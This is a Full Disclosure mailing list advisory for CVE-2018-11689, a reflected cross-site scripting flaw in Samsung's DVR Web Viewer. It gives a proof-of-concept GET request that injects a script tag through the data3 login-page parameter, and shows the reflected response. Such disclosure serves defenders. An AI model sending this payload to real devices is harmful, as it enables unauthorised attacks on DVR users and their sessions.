Full Disclosure mailing list archives
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) CVE-2018-11689
From: yavuz atlas <yavatlas () gmail com>
Date: Wed, 13 Jun 2018 12:42:35 +0300
I. VULNERABILITY ------------------------- Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) II. CVE REFERENCE ------------------------- CVE-2018-11689 III. REFERENCES ------------------------- https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689 IV. CREDIT ------------------------- Yavuz Atlas - Biznet Bilisim http://www.biznet.com.tr/biznet-guvenlik-duyurulari V. DESCRIPTION ------------------------- Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is vulnerable to cross-site scripting. The vulnerability allows remote attackers to inject arbitrary web script or HTML. VI. PROOF OF CONCEPT ------------------------- Request: GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1 Host: 10.10.10.10 Response: HTTP/1.1 200 OK X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true Content-type: text/html Connection: close Date: Wed, 23 May 2018 11:14:09 GMT Server: lighttpd/1.4.35 Content-Length: 10797 … function setcookie(){ var val_rand = Math.random(); if(is_close_user_session == true) document.login_page_submit.close_user_session.value = 1; else document.login_page_submit.close_user_session.value = 0; document.login_page_submit.data1.value = data_parser(document.login_page.data1.value); document.login_page_submit.data2.value = do_encrypt(document.login_page.data2.value); document.login_page_submit.data3.value = </script><script>alert(1)</script>; document.login_page_submit.data4.value = val_rand; document.login_page_submit.submit(); } … _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) CVE-2018-11689 yavuz atlas (Jun 14)